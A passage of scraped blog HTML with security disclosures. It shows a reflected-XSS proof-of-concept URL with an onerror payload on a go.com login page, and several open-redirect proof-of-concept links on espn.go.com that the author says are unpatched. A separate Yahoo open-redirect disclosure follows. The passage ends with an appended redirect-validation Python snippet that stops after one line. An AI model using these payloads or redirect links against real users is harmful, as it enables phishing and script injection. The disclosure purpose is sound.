<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login" target="_blank">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/YourAccount/<wbr></wbr>login</a>"><img src=x onerror=prompt('justqdjing')></span></div>
<div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be</a></span></div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-KexrC5W0nTE/VIb-cXtU22I/AAAAAAAAAhw/j894VKHloJU/s1600/espn_go_r_xss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-KexrC5W0nTE/VIb-cXtU22I/AAAAAAAAAhw/j894VKHloJU/s1600/espn_go_r_xss2.png" width="400" /></span></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-i3uwX5jggI0/VIb-dOTjACI/AAAAAAAAAh0/9T32eJq4ZVE/s1600/espn_go_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-i3uwX5jggI0/VIb-dOTjACI/AAAAAAAAAh0/9T32eJq4ZVE/s1600/espn_go_xss.png" width="400" /></span></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-dPv6WEhPNLE/VIb-duCcbLI/AAAAAAAAAh8/HcWnDgx_tbI/s1600/espn_register_xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-dPv6WEhPNLE/VIb-duCcbLI/AAAAAAAAAh8/HcWnDgx_tbI/s1600/espn_register_xss1.png" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Dest Redirect Privilege Escalation Web Security Vulnerability</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. It could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">One webpage is used for the following tests. The webpage address is "<a href="https://computerpitch.wordpress.com/">https://computerpitch.wordpress.com/</a>". Suppose that this webpage is malicious.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) Login Page </b><b> Dest Redirect Privilege Escalation Vulnerability</b></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%<wbr></wbr>2FAndroidOfficial</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2f%<wbr></wbr>2fdiebiyi.com</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fpages%<wbr></wbr>2Fwwwgooglecom%<wbr></wbr>2Fyahoo101882723190828</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fdiebiyi.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2.2) Vulnerabilities Attacked without User Login</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
<div>
<a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://m.espn.go.com/wireless/<wbr></wbr>mw/util/redirectKeepParams?w=<wbr></wbr>1dpoa&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2FAdcash%<wbr></wbr>2Flinkedinstatus%2Febay%2Falibaba%<wbr></wbr>2F539770783556698112</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com" target="_blank">http://m.espn.go.com/wireless/<wbr></wbr>mw/util/redirectKeepParams?w=<wbr></wbr>1dpoa&url=http%3A%2F%<wbr></wbr>2Fdiebiyi.com</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">This vulnerability was used to demonstrate "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" on Facebook.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></div>
<div>
<a href="https://www.youtube.com/watch?v=HUE8VbbwUms" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?<wbr></wbr>v=HUE8VbbwUms</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></div>
<div>
<a href="http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/<wbr></wbr>covert-redirect/covert-<wbr></wbr>redirect-vulnerability-<wbr></wbr>related-to-oauth-2-0-and-<wbr></wbr>openid/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgwespdeportes/5.4/REDIR/<wbr></wbr>065639236847243821390018102438<wbr></wbr>?D=..&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2Freddit%2Fbing%<wbr></wbr>2Ftmallstatus%<wbr></wbr>2Ftmall541002332331606017</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgwespdeportes/5.4/REDIR/<wbr></wbr>065639236847243821390018102438<wbr></wbr>?D=..&url=http%3A%2F%2Fgoogle.<wbr></wbr>com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgespw/5.4/REDIR/<wbr></wbr>088360294087348871389981133993<wbr></wbr>?D=..&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2FYahoo%<wbr></wbr>2Fhao123%2Fstatus%2Fyandex%2F%<wbr></wbr>2Fru%2F541950359917580289</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
<div>
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgespw/5.4/REDIR/<wbr></wbr>088360294087348871389981133993<wbr></wbr>?D=..&url=http%3A%2F%2Fgoogle.<wbr></wbr>com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></b></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be</a></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espn.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espn.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) </b>Those security problems were reported to ESPN in early 2014. However, they are still unpatched.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/36">http://seclists.org/fulldisclosure/2014/Dec/36</a></span><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html">http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register</a></span><br />
<a href="http://diebiyi.com/articles/security/espn-xss-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/espn-xss-open-redirect/</span></a><br />
<a href="https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest</span></a><br />
<a href="http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss-and-dest-redirect#notes"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss</span></a><br />
<a href="https://www.facebook.com/permalink.php?story_fbid=435630669942495&id=361076084064621" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>435630669942495</span></a><br />
<a href="http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e</span></a><br />
<a href="http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html</span></a><br />
<a href="http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inzeed.tumblr.com/post/<wbr></wbr>120775132901/espn-xss-open-<wbr></wbr>redirect</span></a><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_730f11d" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_730f11d</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>2422320542015551014553/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/">https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1631949187023558&id=1567915086760302" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>1631949187023558</a></span></div>
<div>
<a href="https://twitter.com/tetraphibious/status/606824322896785408" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606824322896785408</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>TBiJP5A3CXg</a></span></div>
<div>
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3</span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/">http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/</a><br /><br /><br /></span></div>
Posted by essayjeans (http://www.blogger.com/profile/11019920613685827608)<br />
<br />
Yahoo Yahoo.com Yahoo.co.jp Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs<br />
Published 2015-06-05T04:47:00.000-07:00, updated 2015-06-05T05:54:05.233-07:00<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-PqJ0aXNHYMc/VXGKPKs0jkI/AAAAAAAAA_E/ofUPLfxPNDY/s1600/yahoo_japan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://3.bp.blogspot.com/-PqJ0aXNHYMc/VXGKPKs0jkI/AAAAAAAAA_E/ofUPLfxPNDY/s400/yahoo_japan.png" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b>
<b>Yahoo Yahoo.com <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Although Yahoo lists open redirect vulnerabilities in its bug bounty program, it seems Yahoo does not take this vulnerability seriously at all.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Multiple Open Redirect vulnerabilities were reported to Yahoo. All of Yahoo's responses were "It is working as designed". However, these vulnerabilities were patched later.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several other security researchers complained about getting similar treatment, too.</span></div>
<div>
<a href="http://seclists.org/fulldisclosure/2014/Jan/51" style="-webkit-transition: color 0.3s; display: inline; line-height: 19.6000003814697px; outline: none; text-align: justify; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Jan/51</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Feb/119" style="background-color: white;" target="_blank">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Feb/119</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Are all Open Redirect vulnerabilities intended behavior? If so, why patch them later?</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div>
<a href="http://4.bp.blogspot.com/-Pd0biilpq0A/VJOvjidlEYI/AAAAAAAAAjA/P1z9No2c1dE/s1600/yahoo_wont_fix_meitu_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="115" src="http://4.bp.blogspot.com/-Pd0biilpq0A/VJOvjidlEYI/AAAAAAAAAjA/P1z9No2c1dE/s1600/yahoo_wont_fix_meitu_1.jpg" width="400" /></span></a></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />According to a CNET report, Yahoo's users were attacked through redirection vulnerabilities. "Yahoo.com visitors over the last few days may have been served with malware via the Yahoo ad network, according to Fox IT, a security firm in the Netherlands. Users visiting pages with the malicious ads were redirected to sites armed with code that exploits vulnerabilities in Java and installs a variety of different malware."</span><br />
<a href="http://www.cnet.com/news/yahoo-users-exposed-to-malware-attack/"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cnet.com/news/<wbr></wbr>yahoo-users-exposed-to-<wbr></wbr>malware-attack/</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
Moreover, since Yahoo is well known worldwide, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, Amazon, Godaddy, Alibaba and Netease, e.g. by bypassing their Open Redirect filters (<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>). These security bugs have not been patched. Other similar web and computer flaws will be published in the near future.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
<br />
The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Disclosed by:</span></div>
<div>
<div>
<div style="padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136" style="line-height: 28px;">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></div>
</div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
Both the Yahoo and Yahoo Japan web applications have a security bug that can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
</div>
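A server-side check for the redirect shapes shown on this page (a target carried in a query parameter such as `appRedirect`, `redirect` or `url`, or appended to the path after `/*`), as an added example that is not code from the original post or from the affected sites. The host names, the allowlist, the sample links and the function names are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qsl

# Query parameters that carry a redirect target in the URLs on this page.
REDIRECT_PARAMS = {"appredirect", "redirect", "url"}

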